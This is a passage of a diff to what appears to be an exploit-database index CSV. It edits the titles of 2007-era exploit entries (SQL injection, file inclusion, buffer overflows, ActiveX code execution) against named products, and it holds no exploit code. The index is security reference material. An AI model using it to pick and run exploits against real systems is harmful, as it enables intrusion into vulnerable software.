Exploit",2007-07-27,qaaz,aix,local,0 +4232,platforms/aix/local/4232.sh,"IBM AIX 5.3 sp6 - pioout Arbitrary Library Loading Local Root Exploit",2007-07-27,qaaz,aix,local,0 +4233,platforms/aix/local/4233.c,"IBM AIX 5.3 sp6 - ftp gets() Local Root Exploit",2007-07-27,qaaz,aix,local,0 4234,platforms/windows/remote/4234.html,"mlsrvx.dll 1.8.9.1 ArGoSoft Mail Server Data Write/Code Execution",2007-07-27,callAX,windows,remote,0 -4235,platforms/php/webapps/4235.txt,"Seditio CMS <= 121 - (pfs.php) Remote File Upload",2007-07-27,A.D.T,php,webapps,0 +4235,platforms/php/webapps/4235.txt,"Seditio CMS 121 - (pfs.php) Remote File Upload",2007-07-27,A.D.T,php,webapps,0 4236,platforms/windows/local/4236.php,"PHP 5.x - (Win32service) Local Safe Mode Bypass Exploit",2007-07-27,NetJackal,windows,local,0 4237,platforms/windows/remote/4237.html,"Nessus Vulnerability Scanner 3.0.6 - ActiveX Command Exec Exploit",2007-07-27,h07,windows,remote,0 -4238,platforms/php/webapps/4238.txt,"Adult Directory (cat_id) Remote SQL Injection",2007-07-27,t0pP8uZz,php,webapps,0 -4239,platforms/asp/webapps/4239.txt,"SimpleBlog 3.0 - (comments_get.asp id) Remote SQL Injection",2007-07-28,g00ns,asp,webapps,0 +4238,platforms/php/webapps/4238.txt,"Adult Directory (cat_id) SQL Injection",2007-07-27,t0pP8uZz,php,webapps,0 +4239,platforms/asp/webapps/4239.txt,"SimpleBlog 3.0 - (comments_get.asp id) SQL Injection",2007-07-28,g00ns,asp,webapps,0 4240,platforms/windows/remote/4240.html,"VMware IntraProcessLogging.dll 5.5.3.42958 - Arbitrary Data Write Exploit",2007-07-28,callAX,windows,remote,0 -4241,platforms/php/webapps/4241.txt,"PHP123 Top Sites - (category.php cat) Remote SQL Injection",2007-07-28,t0pP8uZz,php,webapps,0 -4242,platforms/php/webapps/4242.php,"LinPHA <= 1.3.1 - (new_images.php) Remote Blind SQL Injection Exploit",2007-07-29,EgiX,php,webapps,0 +4241,platforms/php/webapps/4241.txt,"PHP123 Top Sites - (category.php cat) SQL Injection",2007-07-28,t0pP8uZz,php,webapps,0 +4242,platforms/php/webapps/4242.php,"LinPHA 1.3.1 - (new_images.php) Remote Blind SQL Injection Exploit",2007-07-29,EgiX,php,webapps,0 4243,platforms/linux/remote/4243.c,"CoreHTTP 0.5.3alpha (httpd) - Remote Buffer Overflow Exploit",2007-07-29,vade79,linux,remote,80 4244,platforms/windows/remote/4244.html,"VMware Inc 6.0.0 - (vielib.dll 2.2.5.42958) Remode Code Execution Exploit",2007-07-29,callAX,windows,remote,0 4245,platforms/windows/remote/4245.html,"VMware Inc 6.0.0 CreateProcess Remote Code Execution Exploit",2007-07-30,callAX,windows,remote,0 -4246,platforms/php/webapps/4246.txt,"wolioCMS Auth Bypass / Remote SQL Injection Vulnerabilities",2007-07-30,k1tk4t,php,webapps,0 -4247,platforms/windows/remote/4247.c,"Borland Interbase <= 2007 SP1 Create-Request Remote Overflow Exploit",2007-07-30,BackBone,windows,remote,3050 -4248,platforms/php/webapps/4248.txt,"Joomla Component com_gmaps 1.00 - (mapId) Remote SQL Injection",2007-07-31,"Mehmet Ince",php,webapps,0 +4246,platforms/php/webapps/4246.txt,"wolioCMS Auth Bypass / SQL Injection Vulnerabilities",2007-07-30,k1tk4t,php,webapps,0 +4247,platforms/windows/remote/4247.c,"Borland Interbase 2007 SP1 Create-Request Remote Overflow Exploit",2007-07-30,BackBone,windows,remote,3050 +4248,platforms/php/webapps/4248.txt,"Joomla Component com_gmaps 1.00 - (mapId) SQL Injection",2007-07-31,"Mehmet Ince",php,webapps,0 4249,platforms/multiple/dos/4249.rb,"Asterisk < 1.2.22 / 1.4.8 IAX2 channel driver - Remote Crash Exploit",2007-07-31,tenkei_ev,multiple,dos,0 4250,platforms/windows/remote/4250.html,"Yahoo! Widget < 4.0.5 - GetComponentVersion() Remote Overflow Exploit",2007-07-31,lhoang8500,windows,remote,0 4251,platforms/windows/dos/4251.html,"Microsoft Internet Explorer 6 DirectX Media Remote Overflow DoS Exploit",2007-07-31,DeltahackingTEAM,windows,dos,0 4252,platforms/windows/local/4252.c,"Live for Speed S1/S2/Demo - (.mpr replay) Buffer Overflow Exploit",2007-08-01,n00b,windows,local,0 -4253,platforms/php/webapps/4253.pl,"paBugs <= 2.0 Beta 3 - (main.php cid) Remote SQL Injection Exploit",2007-08-02,uimp,php,webapps,0 -4254,platforms/php/webapps/4254.txt,"AuraCMS - [Forum Module] Remote SQL Injection",2007-08-05,k1tk4t,php,webapps,0 -4255,platforms/windows/remote/4255.html,"CHILKAT ASP String (CkString.dll <= 1.1) SaveToFile() Inscure Method",2007-08-05,shinnai,windows,remote,0 -4256,platforms/php/webapps/4256.pl,"Envolution <= 1.1.0 - (topic) Remote SQL Injection Exploit",2007-08-05,k1tk4t,php,webapps,0 +4253,platforms/php/webapps/4253.pl,"paBugs 2.0 Beta 3 - (main.php cid) SQL Injection Exploit",2007-08-02,uimp,php,webapps,0 +4254,platforms/php/webapps/4254.txt,"AuraCMS - [Forum Module] SQL Injection",2007-08-05,k1tk4t,php,webapps,0 +4255,platforms/windows/remote/4255.html,"CHILKAT ASP String (CkString.dll 1.1) SaveToFile() Inscure Method",2007-08-05,shinnai,windows,remote,0 +4256,platforms/php/webapps/4256.pl,"Envolution 1.1.0 - (topic) SQL Injection Exploit",2007-08-05,k1tk4t,php,webapps,0 4257,platforms/windows/local/4257.c,"Panda Antivirus 2008 - Local Privilege Escalation Exploit",2007-08-05,tarkus,windows,local,0 -4258,platforms/php/webapps/4258.txt,"la-nai CMS 1.2.14 - Multiple Remote SQL Injection Vulnerabilities",2007-08-06,k1tk4t,php,webapps,0 +4258,platforms/php/webapps/4258.txt,"la-nai CMS 1.2.14 - Multiple SQL Injection Vulnerabilities",2007-08-06,k1tk4t,php,webapps,0 4259,platforms/windows/remote/4259.txt,"Microsoft Visual 6 - (VDT70.DLL NotSafe) Stack Overflow Exploit",2007-08-06,DeltahackingTEAM,windows,remote,0 4260,platforms/multiple/dos/4260.php,"PHP mSQL (msql_connect) Local Buffer Overflow PoC",2007-08-06,NetJackal,multiple,dos,0 4261,platforms/cgi/webapps/4261.txt,"YNP Portal System 2.2.0 - (showpage.cgi p) Remote File Disclosure",2007-08-06,GoLd_M,cgi,webapps,0 4262,platforms/windows/local/4262.cpp,"Live for Speed S1/S2/Demo - (.ply) Buffer Overflow Exploit",2007-08-06,n00b,windows,local,0 4263,platforms/windows/local/4263.cpp,"Live for Speed S1/S2/Demo - (.spr) Buffer Overflow Exploit",2007-08-06,n00b,windows,local,0 -4264,platforms/cgi/webapps/4264.txt,"CartWeaver (Details.cfm ProdID) Remote SQL Injection",2007-08-06,meoconx,cgi,webapps,0 -4265,platforms/php/webapps/4265.txt,"Prozilla Pub Site Directory (directory.php cat) SQL Injection Vulnerbility",2007-08-06,t0pP8uZz,php,webapps,0 +4264,platforms/cgi/webapps/4264.txt,"CartWeaver (Details.cfm ProdID) SQL Injection",2007-08-06,meoconx,cgi,webapps,0 +4265,platforms/php/webapps/4265.txt,"Prozilla Pub Site Directory (directory.php cat) SQL Injection",2007-08-06,t0pP8uZz,php,webapps,0 4266,platforms/multiple/remote/4266.py,"BIND 9 0.3beta - DNS Cache Poisoning Exploit",2007-08-07,posedge,multiple,remote,0 -4267,platforms/php/webapps/4267.txt,"PhpHostBot <= 1.06 - (svr_rootscript) Remote File Inclusion",2007-08-07,K-159,php,webapps,0 +4267,platforms/php/webapps/4267.txt,"PhpHostBot 1.06 - (svr_rootscript) Remote File Inclusion",2007-08-07,K-159,php,webapps,0 4268,platforms/php/webapps/4268.txt,"PHPNews 0.93 - (format_menue) Remote File Inclusion",2007-08-07,kezzap66345,php,webapps,0 4269,platforms/php/webapps/4269.txt,"frontaccounting 1.12 build 31 - Remote File Inclusion",2007-08-07,kezzap66345,php,webapps,0 4270,platforms/windows/local/4270.php,"PHP mSQL (msql_connect) Local Buffer Overflow Exploit",2007-08-08,Inphex,windows,local,0 -4271,platforms/php/webapps/4271.txt,"FishCart <= 3.2 RC2 - (fc_example.php) Remote File Inclusion",2007-08-08,k1n9k0ng,php,webapps,0 +4271,platforms/php/webapps/4271.txt,"FishCart 3.2 RC2 - (fc_example.php) Remote File Inclusion",2007-08-08,k1n9k0ng,php,webapps,0 4272,platforms/windows/dos/4272.c,"Cisco IOS Next Hop Resolution Protocol (NHRP) Denial of Service Exploit",2007-08-09,"Martin Kluge",windows,dos,0 4273,platforms/php/webapps/4273.txt,"Ncaster 1.7.2 - (archive.php) Remote File Inclusion",2007-08-09,k1n9k0ng,php,webapps,0 -4274,platforms/windows/local/4274.php,"PHP <= 5.2.3 snmpget() object id Local Buffer Overflow Exploit (EDI)",2007-08-09,Inphex,windows,local,0 -4275,platforms/php/webapps/4275.php,"Php Blue Dragon CMS 3.0.0 - Remote SQL Injection Exploit",2007-08-10,Kacper,php,webapps,0 +4274,platforms/windows/local/4274.php,"PHP 5.2.3 snmpget() object id Local Buffer Overflow Exploit (EDI)",2007-08-09,Inphex,windows,local,0 +4275,platforms/php/webapps/4275.php,"Php Blue Dragon CMS 3.0.0 - SQL Injection Exploit",2007-08-10,Kacper,php,webapps,0 4276,platforms/php/webapps/4276.txt,"php blue dragon CMS 3.0.0 - Remote File Inclusion",2007-08-10,Kacper,php,webapps,0 4277,platforms/php/webapps/4277.php,"Php Blue Dragon CMS 3.0.0 - Remote Code Execution Exploit",2007-08-10,Kacper,php,webapps,0 4278,platforms/php/webapps/4278.txt,"Pixlie 1.7 - (pixlie.php root) Remote File Disclosure",2007-08-10,Rizgar,php,webapps,0 4279,platforms/windows/remote/4279.html,"Microsoft DXMedia SDK 6 - (SourceUrl) ActiveX Remote Code Execution",2007-08-10,h07,windows,remote,0 4280,platforms/windows/remote/4280.pl,"Savant 3.1 Get Request Remote Overflow Exploit (Universal)",2007-08-12,"Jacopo Cervini",windows,remote,80 4281,platforms/windows/dos/4281.c,"WengoPhone 2.x SIP Phone Remote Denial of Service Exploit",2007-08-13,ZwelL,windows,dos,0 -4282,platforms/php/webapps/4282.txt,"SOTEeSKLEP <= 3.5RC9 - (file) Remote File Disclosure",2007-08-13,dun,php,webapps,0 +4282,platforms/php/webapps/4282.txt,"SOTEeSKLEP 3.5RC9 - (file) Remote File Disclosure",2007-08-13,dun,php,webapps,0 4283,platforms/windows/remote/4283.pl,"Racer 0.5.3 beta 5 - Remote Buffer Overflow Exploit",2007-08-13,n00b,windows,remote,26000 -4284,platforms/php/webapps/4284.txt,"Prozilla Webring Website Script (category.php cat) Remote SQL Injection",2007-08-13,t0pP8uZz,php,webapps,0 +4284,platforms/php/webapps/4284.txt,"Prozilla Webring Website Script (category.php cat) SQL Injection",2007-08-13,t0pP8uZz,php,webapps,0 4285,platforms/windows/dos/4285.c,"CounterPath X-Lite 3.x SIP phone Remote Denial of Service Exploit",2007-08-13,ZwelL,windows,dos,0 4286,platforms/cgi/webapps/4286.txt,"IBM Rational ClearQuest Web Login Bypass SQL Injection",2007-08-14,s4squatch,cgi,webapps,0 4287,platforms/windows/remote/4287.py,"SurgeMail 38k (SEARCH) Remote Buffer Overflow Exploit",2007-08-14,"Joey Mengele",windows,remote,143 4288,platforms/windows/dos/4288.c,"WireShark < 0.99.6 Mms Remote Denial of Service Exploit",2007-08-14,ZwelL,windows,dos,0 4289,platforms/windows/dos/4289.php,"Easy Chat Server 2.2 - Remote Denial of Service Exploit",2007-08-14,NetJackal,windows,dos,0 4290,platforms/windows/remote/4290.html,"EDraw Office Viewer Component 5.1 HttpDownloadFile() Insecure Method",2007-08-16,shinnai,windows,remote,0 -4291,platforms/php/webapps/4291.txt,"GetMyOwnArcade (search.php query) Remote SQL Injection",2007-08-16,RoXur777,php,webapps,0 +4291,platforms/php/webapps/4291.txt,"GetMyOwnArcade (search.php query) SQL Injection",2007-08-16,RoXur777,php,webapps,0 4292,platforms/windows/remote/4292.cpp,"Diskeeper 9 - Remote Memory Disclosure Exploit",2007-08-17,Pravus,windows,remote,0 -4293,platforms/windows/dos/4293.php,"PHP <= 5.2.0 - (php_win32sti) Local Buffer Overflow PoC (Win32)",2007-08-18,boecke,windows,dos,0 +4293,platforms/windows/dos/4293.php,"PHP 5.2.0 - (php_win32sti) Local Buffer Overflow PoC (Win32)",2007-08-18,boecke,windows,dos,0 4294,platforms/windows/dos/4294.pl,"Mercury SMTPD Remote Preauth Stack Based Overrun PoC",2007-08-18,eliteboy,windows,dos,0 -4295,platforms/php/webapps/4295.txt,"Squirrelcart <= 1.x.x - (cart.php) Remote File Inclusion",2007-08-19,ShaiMagal,php,webapps,0 -4296,platforms/php/webapps/4296.txt,"Mambo Component SimpleFAQ 2.11 - Remote SQL Injection",2007-08-20,k1tk4t,php,webapps,0 +4295,platforms/php/webapps/4295.txt,"Squirrelcart 1.x.x - (cart.php) Remote File Inclusion",2007-08-19,ShaiMagal,php,webapps,0 +4296,platforms/php/webapps/4296.txt,"Mambo Component SimpleFAQ 2.11 - SQL Injection",2007-08-20,k1tk4t,php,webapps,0 4297,platforms/hardware/dos/4297.pl,"Cisco IP Phone 7940 - (3 SIP messages) Remote Denial of Service Exploit",2007-08-21,MADYNES,hardware,dos,0 4298,platforms/hardware/dos/4298.pl,"Cisco IP Phone 7940 - (10 SIP messages) Remote Denial of Service Exploit",2007-08-21,MADYNES,hardware,dos,0 4299,platforms/windows/remote/4299.html,"eCentrex VOIP Client module (uacomx.ocx 2.0.1) Remote BoF Exploit",2007-08-21,rgod,windows,remote,0 -4300,platforms/php/webapps/4300.txt,"litecommerce 2004 - (category_id) Remote SQL Injection",2007-08-21,k1tk4t,php,webapps,0 +4300,platforms/php/webapps/4300.txt,"litecommerce 2004 - (category_id) SQL Injection",2007-08-21,k1tk4t,php,webapps,0 4301,platforms/windows/remote/4301.cpp,"Mercury/32 4.51 SMTPD CRAM-MD5 Pre-Auth Remote Overflow Exploit",2007-08-22,ZhenHan.Liu,windows,remote,25 -4302,platforms/windows/local/4302.php,"PHP <= 5.2.3 - (php_win32sti) Local Buffer Overflow Exploit",2007-08-22,Inphex,windows,local,0 -4303,platforms/windows/local/4303.php,"PHP <= 5.2.3 - (php_win32sti) Local Buffer Overflow Exploit (2)",2007-08-22,NetJackal,windows,local,0 +4302,platforms/windows/local/4302.php,"PHP 5.2.3 - (php_win32sti) Local Buffer Overflow Exploit",2007-08-22,Inphex,windows,local,0 +4303,platforms/windows/local/4303.php,"PHP 5.2.3 - (php_win32sti) Local Buffer Overflow Exploit (2)",2007-08-22,NetJackal,windows,local,0 4304,platforms/windows/dos/4304.php,"PHP 5.2.3 - php_ntuser ntuser_getuserlist() Local Buffer Overflow PoC",2007-08-23,shinnai,windows,dos,0 -4305,platforms/php/webapps/4305.txt,"Joomla Component NeoRecruit <= 1.4 - (id) SQL Injection",2007-08-23,ajann,php,webapps,0 -4306,platforms/php/webapps/4306.txt,"Mambo Component RemoSitory (cat) Remote SQL Injection",2007-08-23,ajann,php,webapps,0 -4307,platforms/php/webapps/4307.txt,"Joomla Component RSfiles <= 1.0.2 - (path) File Download",2007-08-23,ajann,php,webapps,0 -4308,platforms/php/webapps/4308.txt,"Joomla Component Nice Talk <= 0.9.3 - (tagid) SQL Injection",2007-08-23,ajann,php,webapps,0 -4309,platforms/php/webapps/4309.txt,"Joomla Component EventList <= 0.8 - (did) SQL Injection",2007-08-23,ajann,php,webapps,0 -4310,platforms/php/webapps/4310.txt,"Joomla Component BibTeX <= 1.3 - Remote Blind SQL Injection Exploit",2007-08-23,ajann,php,webapps,0 +4305,platforms/php/webapps/4305.txt,"Joomla Component NeoRecruit 1.4 - (id) SQL Injection",2007-08-23,ajann,php,webapps,0 +4306,platforms/php/webapps/4306.txt,"Mambo Component RemoSitory (cat) SQL Injection",2007-08-23,ajann,php,webapps,0 +4307,platforms/php/webapps/4307.txt,"Joomla Component RSfiles 1.0.2 - (path) File Download",2007-08-23,ajann,php,webapps,0 +4308,platforms/php/webapps/4308.txt,"Joomla Component Nice Talk 0.9.3 - (tagid) SQL Injection",2007-08-23,ajann,php,webapps,0 +4309,platforms/php/webapps/4309.txt,"Joomla Component EventList 0.8 - (did) SQL Injection",2007-08-23,ajann,php,webapps,0 +4310,platforms/php/webapps/4310.txt,"Joomla Component BibTeX 1.3 - Remote Blind SQL Injection Exploit",2007-08-23,ajann,php,webapps,0 4311,platforms/windows/local/4311.php,"PHP FFI Extension 5.0.5 - Local Safe_mode Bypass Exploit",2007-08-23,NetJackal,windows,local,0 4312,platforms/linux/remote/4312.c,"ProFTPD 1.x (module mod_tls) - Remote Buffer Overflow Exploit",2007-08-24,netris,linux,remote,21 4313,platforms/php/webapps/4313.pl,"SunShop 4.0 RC 6 - (search) Remote Blind SQL Injection Exploit",2007-08-25,k1tk4t,php,webapps,0 @@ -3964,110 +3964,110 @@ id,file,description,date,author,platform,type,port 4315,platforms/linux/remote/4315.py,"SIDVault LDAP Server Preauth Remote Buffer Overflow Exploit",2007-08-25,"Joxean Koret",linux,remote,389 4316,platforms/windows/remote/4316.cpp,"Mercury/32 3.32-4.51 - SMTP Pre-Auth EIP Overwrite Exploit",2007-08-26,Heretic2,windows,remote,25 4317,platforms/php/webapps/4317.txt,"2532/Gigs 1.2.1 - (activateuser.php) Local File Inclusion",2007-08-26,bd0rk,php,webapps,0 -4318,platforms/windows/dos/4318.php,"PHP <= 5.2.0 - (php_iisfunc.dll) Local Buffer Overflow PoC (Win32)",2007-08-27,boecke,windows,dos,0 +4318,platforms/windows/dos/4318.php,"PHP 5.2.0 - (php_iisfunc.dll) Local Buffer Overflow PoC (Win32)",2007-08-27,boecke,windows,dos,0 4319,platforms/hardware/dos/4319.pl,"Thomson SIP phone ST 2030 - Remote Denial of Service Exploit",2007-08-27,MADYNES,hardware,dos,0 -4320,platforms/php/webapps/4320.txt,"SomeryC <= 0.2.4 - (include.php skindir) Remote File Inclusion",2007-08-27,Katatafish,php,webapps,0 +4320,platforms/php/webapps/4320.txt,"SomeryC 0.2.4 - (include.php skindir) Remote File Inclusion",2007-08-27,Katatafish,php,webapps,0 4321,platforms/linux/remote/4321.rb,"BitchX 1.1 Final - MODE Remote Heap Overflow Exploit (0Day)",2007-08-27,bannedit,linux,remote,0 4322,platforms/windows/remote/4322.html,"NVR SP2 2.0 (nvUnifiedControl.dll 1.1.45.0) - SetText() Remote Exploit",2007-08-28,shinnai,windows,remote,0 4323,platforms/windows/remote/4323.html,"NVR SP2 2.0 (nvUtility.dll 1.0.14.0) - SaveXMLFile() Inscure Method",2007-08-27,shinnai,windows,remote,0 4324,platforms/windows/remote/4324.html,"NVR SP2 2.0 (nvUtility.dll 1.0.14.0) - DeleteXMLFile() Inscure Method",2007-08-27,shinnai,windows,remote,0 4325,platforms/windows/local/4325.php,"XAMPP for Windows 1.6.3a - Local Privilege Escalation Exploit",2007-08-27,Inphex,windows,local,0 -4326,platforms/php/webapps/4326.txt,"Arcadem 2.01 - Remote SQL Injection / RFI Vulnerabilties",2007-08-27,SmOk3,php,webapps,0 -4327,platforms/php/webapps/4327.txt,"WBB2-Addon: Acrotxt 1.0 - (show) Remote SQL Injection",2007-08-27,D4m14n,php,webapps,0 +4326,platforms/php/webapps/4326.txt,"Arcadem 2.01 - SQL Injection / Remote File Inclusion Vulnerabilties",2007-08-27,SmOk3,php,webapps,0 +4327,platforms/php/webapps/4327.txt,"WBB2-Addon: Acrotxt 1.0 - (show) SQL Injection",2007-08-27,D4m14n,php,webapps,0 4328,platforms/windows/remote/4328.html,"Postcast Server Pro 3.0.61 - / Quiksoft EasyMail (emsmtp.dll 6.0.1) BoF",2007-08-28,rgod,windows,remote,0 -4329,platforms/php/webapps/4329.txt,"Micro CMS 3.5 - (revert-content.php) Remote SQL Injection",2007-08-28,"not sec group",php,webapps,0 -4330,platforms/php/webapps/4330.txt,"ACG News 1.0 - (aid/catid) Remote SQL Injection Vulnerabilities",2007-08-28,SmOk3,php,webapps,0 +4329,platforms/php/webapps/4329.txt,"Micro CMS 3.5 - (revert-content.php) SQL Injection",2007-08-28,"not sec group",php,webapps,0 +4330,platforms/php/webapps/4330.txt,"ACG News 1.0 - (aid/catid) SQL Injection Vulnerabilities",2007-08-28,SmOk3,php,webapps,0 4331,platforms/php/webapps/4331.pl,"DL PayCart 1.01 - (viewitem.php ItemID) Blind SQL Injection Exploit",2007-08-28,irvian,php,webapps,0 -4332,platforms/php/webapps/4332.txt,"VWar <= 1.5.0 R15 - (mvcw.php) Remote File Inclusion",2007-08-28,DNX,php,webapps,0 -4333,platforms/php/webapps/4333.txt,"PHPNuke-Clan <= 4.2.0 - (mvcw_conver.php) RFI",2007-08-28,DNX,php,webapps,0 +4332,platforms/php/webapps/4332.txt,"VWar 1.5.0 R15 - (mvcw.php) Remote File Inclusion",2007-08-28,DNX,php,webapps,0 +4333,platforms/php/webapps/4333.txt,"PHPNuke-Clan 4.2.0 - (mvcw_conver.php) Remote File Inclusion",2007-08-28,DNX,php,webapps,0 4334,platforms/windows/remote/4334.txt,"MSN messenger 7.x (8.0?) - Video Remote Heap Overflow Exploit",2007-08-29,wushi,windows,remote,0 4335,platforms/windows/dos/4335.txt,"Yahoo! Messenger 8.1.0.413 - (webcam) Remote Crash Exploit",2007-08-29,wushi,windows,dos,0 4336,platforms/php/webapps/4336.txt,"xGB 2.0 - (xGB.php) Remote Permission Bypass",2007-08-29,DarkFuneral,php,webapps,0 4337,platforms/windows/dos/4337.c,"Microsoft Windows - (GDI32.DLL) Denial of Service Exploit (MS07-046)",2007-08-29,"Gil-Dong / Woo-Chi",windows,dos,0 4338,platforms/php/webapps/4338.pl,"ABC estore 3.0 - (cat_id) Remote Blind SQL Injection Exploit",2007-08-29,k1tk4t,php,webapps,0 -4339,platforms/php/webapps/4339.txt,"PHPNS 1.1 - (shownews.php id) Remote SQL Injection",2007-08-29,SmOk3,php,webapps,0 +4339,platforms/php/webapps/4339.txt,"PHPNS 1.1 - (shownews.php id) SQL Injection",2007-08-29,SmOk3,php,webapps,0 4340,platforms/php/webapps/4340.txt,"phpBG 0.9.1 - (rootdir) Remote File Inclusion Vulnerabilities",2007-08-29,GoLd_M,php,webapps,0 -4341,platforms/php/webapps/4341.txt,"Pakupaku CMS <= 0.4 - Remote File Upload / LFI",2007-08-29,GoLd_M,php,webapps,0 -4342,platforms/php/webapps/4342.txt,"NMDeluxe 2.0.0 - (id) Remote SQL Injection",2007-08-30,"not sec group",php,webapps,0 +4341,platforms/php/webapps/4341.txt,"Pakupaku CMS 0.4 - Remote File Upload / LFI",2007-08-29,GoLd_M,php,webapps,0 +4342,platforms/php/webapps/4342.txt,"NMDeluxe 2.0.0 - (id) SQL Injection",2007-08-30,"not sec group",php,webapps,0 4343,platforms/cgi/webapps/4343.txt,"Ourspace 2.0.9 - (uploadmedia.cgi) Remote File Upload",2007-08-30,Don,cgi,webapps,0 4344,platforms/windows/dos/4344.php,"Hexamail Server 3.0.0.001 - (pop3) pre-auth Remote Overflow PoC",2007-08-30,rgod,windows,dos,0 4345,platforms/windows/local/4345.c,"Norman Virus Control nvcoaft51.sys ioctl BF672028 Exploit",2007-08-30,inocraM,windows,local,0 -4346,platforms/php/webapps/4346.pl,"phpBB Links MOD 1.2.2 - Remote SQL Injection Exploit",2007-08-31,Don,php,webapps,0 +4346,platforms/php/webapps/4346.pl,"phpBB Links MOD 1.2.2 - SQL Injection Exploit",2007-08-31,Don,php,webapps,0 4347,platforms/linux/dos/4347.pl,"Wireshark < 0.99.5 DNP3 Dissector Infinite Loop Exploit",2007-08-31,"Beyond Security",linux,dos,0 4348,platforms/windows/remote/4348.c,"PPStream (PowerPlayer.dll 2.0.1.3829) ActiveX Remote Overflow Exploit",2007-08-31,dummy,windows,remote,0 4349,platforms/php/webapps/4349.pl,"CKGold Shopping Cart 2.0 - (category.php) Blind SQL Injection Exploit",2007-08-31,k1tk4t,php,webapps,0 -4350,platforms/php/webapps/4350.php,"Joomla! 1.5 Beta1/Beta2/RC1 - Remote SQL Injection Exploit",2007-09-01,Silentz,php,webapps,0 -4351,platforms/windows/remote/4351.html,"Yahoo! Messenger (YVerInfo.dll <= 2007.8.27.1) ActiveX BoF Exploit",2007-09-01,minhbq,windows,remote,0 +4350,platforms/php/webapps/4350.php,"Joomla! 1.5 Beta1/Beta2/RC1 - SQL Injection Exploit",2007-09-01,Silentz,php,webapps,0 +4351,platforms/windows/remote/4351.html,"Yahoo! Messenger (YVerInfo.dll 2007.8.27.1) ActiveX BoF Exploit",2007-09-01,minhbq,windows,remote,0 4352,platforms/php/webapps/4352.txt,"Weblogicnet - (files_dir) Multiple Remote File Inclusion Vulnerabilities",2007-09-02,bius,php,webapps,0 -4353,platforms/php/webapps/4353.txt,"Yvora CMS 1.0 - (error_view.php ID) Remote SQL Injection",2007-09-02,k1tk4t,php,webapps,0 +4353,platforms/php/webapps/4353.txt,"Yvora CMS 1.0 - (error_view.php ID) SQL Injection",2007-09-02,k1tk4t,php,webapps,0 4354,platforms/windows/local/4354.py,"Virtual DJ 5.0 - (.m3u) Local Buffer OverFlow Exploit",2007-09-02,0x58,windows,local,0 4355,platforms/windows/local/4355.php,"OTSTurntables 1.00 - (.m3u) Local Buffer Overflow Exploit",2007-09-02,0x58,windows,local,0 4356,platforms/php/webapps/4356.txt,"eNetman 20050830 - (index.php page) Remote File Inclusion",2007-09-03,JaheeM,php,webapps,0 4357,platforms/windows/remote/4357.html,"Telecom Italy Alice Messenger Remote registry key manipulation Exploit",2007-09-03,rgod,windows,remote,0 4358,platforms/php/webapps/4358.txt,"STPHPLibrary (STPHPLIB_DIR) Remote File Inclusion",2007-09-03,leetsecurity,php,webapps,0 4359,platforms/multiple/dos/4359.txt,"Apple Quicktime < 7.2 - SMIL Remote Integer Overflow PoC",2007-09-03,"David Vaartjes",multiple,dos,0 -4360,platforms/windows/remote/4360.rb,"CCProxy <= 6.2 - Telnet Proxy Ping Overflow Exploit (Metasploit)",2007-09-03,"Patrick Webster",windows,remote,0 +4360,platforms/windows/remote/4360.rb,"CCProxy 6.2 - Telnet Proxy Ping Overflow Exploit (Metasploit)",2007-09-03,"Patrick Webster",windows,remote,0 4361,platforms/windows/local/4361.pl,"Microsoft Visual Basic 6.0 VBP_Open OLE Local CodeExec Exploit",2007-09-04,Koshi,windows,local,0 4362,platforms/linux/remote/4362.pl,"Web Oddity Web Server 0.09b - Directory Transversal Exploit",2007-09-04,Katatafish,linux,remote,0 -4363,platforms/php/webapps/4363.txt,"PHPOF <= 20040226 - (DB_adodb.class.php) RFI",2007-09-04,"ThE TiGeR",php,webapps,0 +4363,platforms/php/webapps/4363.txt,"PHPOF 20040226 - (DB_adodb.class.php) Remote File Inclusion",2007-09-04,"ThE TiGeR",php,webapps,0 4364,platforms/windows/local/4364.php,"AtomixMP3 2.3 - (.pls) Local Buffer OverFlow Exploit",2007-09-05,0x58,windows,local,0 -4365,platforms/php/webapps/4365.txt,"AnyInventory <= 2.0 - (environment.php) Remote File Inclusion",2007-09-05,"ThE TiGeR",php,webapps,0 +4365,platforms/php/webapps/4365.txt,"AnyInventory 2.0 - (environment.php) Remote File Inclusion",2007-09-05,"ThE TiGeR",php,webapps,0 4366,platforms/windows/remote/4366.html,"GlobalLink 2.7.0.8 glItemCom.dll SetInfo() Heap Overflow Exploit",2007-09-05,void,windows,remote,0 4367,platforms/windows/remote/4367.c,"Trend Micro ServerProtect eng50.dll - Remote Stack Overflow Exploit",2007-09-06,devcode,windows,remote,0 4368,platforms/php/webapps/4368.txt,"phpMytourney (menu.php) Remote File Inclusion",2007-09-06,S.W.A.T.,php,webapps,0 4369,platforms/windows/dos/4369.html,"Microsoft Visual FoxPro 6.0 (FPOLE.OCX 6.0.8450.0) - Remote PoC",2007-09-06,shinnai,windows,dos,0 -4370,platforms/php/webapps/4370.txt,"Webace-Linkscript 1.3 SE (start.php) Remote SQL Injection",2007-09-07,k1tk4t,php,webapps,0 -4371,platforms/php/webapps/4371.txt,"RW::Download 2.0.3 lite - (index.php dlid) Remote SQL Injection",2007-09-07,k1tk4t,php,webapps,0 +4370,platforms/php/webapps/4370.txt,"Webace-Linkscript 1.3 SE (start.php) SQL Injection",2007-09-07,k1tk4t,php,webapps,0 +4371,platforms/php/webapps/4371.txt,"RW::Download 2.0.3 lite - (index.php dlid) SQL Injection",2007-09-07,k1tk4t,php,webapps,0 4372,platforms/windows/remote/4372.html,"GlobalLink 2.7.0.8 glitemflat.dll SetClientInfo() Heap Overflow Exploit",2007-09-07,void,windows,remote,0 4373,platforms/windows/dos/4373.html,"EDraw Office Viewer Component 5.2 - ActiveX Remote BoF PoC",2007-09-07,shinnai,windows,dos,0 -4374,platforms/php/webapps/4374.txt,"Online Fantasy Football League (OFFL) 0.2.6 - RFI Vulnerabilities",2007-09-07,MhZ91,php,webapps,0 +4374,platforms/php/webapps/4374.txt,"Online Fantasy Football League (OFFL) 0.2.6 - Remote File Inclusion Vulnerabilities",2007-09-07,MhZ91,php,webapps,0 4375,platforms/windows/dos/4375.txt,"BaoFeng2 - Mps.dll ActiveX Multiple Remote Buffer Overflow PoCs",2007-09-08,ZhenHan.Liu,windows,dos,0 -4376,platforms/php/webapps/4376.txt,"TLM CMS 3.2 - Multiple Remote SQL Injection Vulnerabilities",2007-09-08,k1tk4t,php,webapps,0 -4377,platforms/php/webapps/4377.txt,"Focus/SIS <= 1.0/2.2 - Remote File Inclusion Vulnerabilities",2007-09-08,"ThE TiGeR",php,webapps,0 -4378,platforms/php/webapps/4378.htm,"fuzzylime CMS <= 3.0 - Local File Inclusion",2007-09-08,"not sec group",php,webapps,0 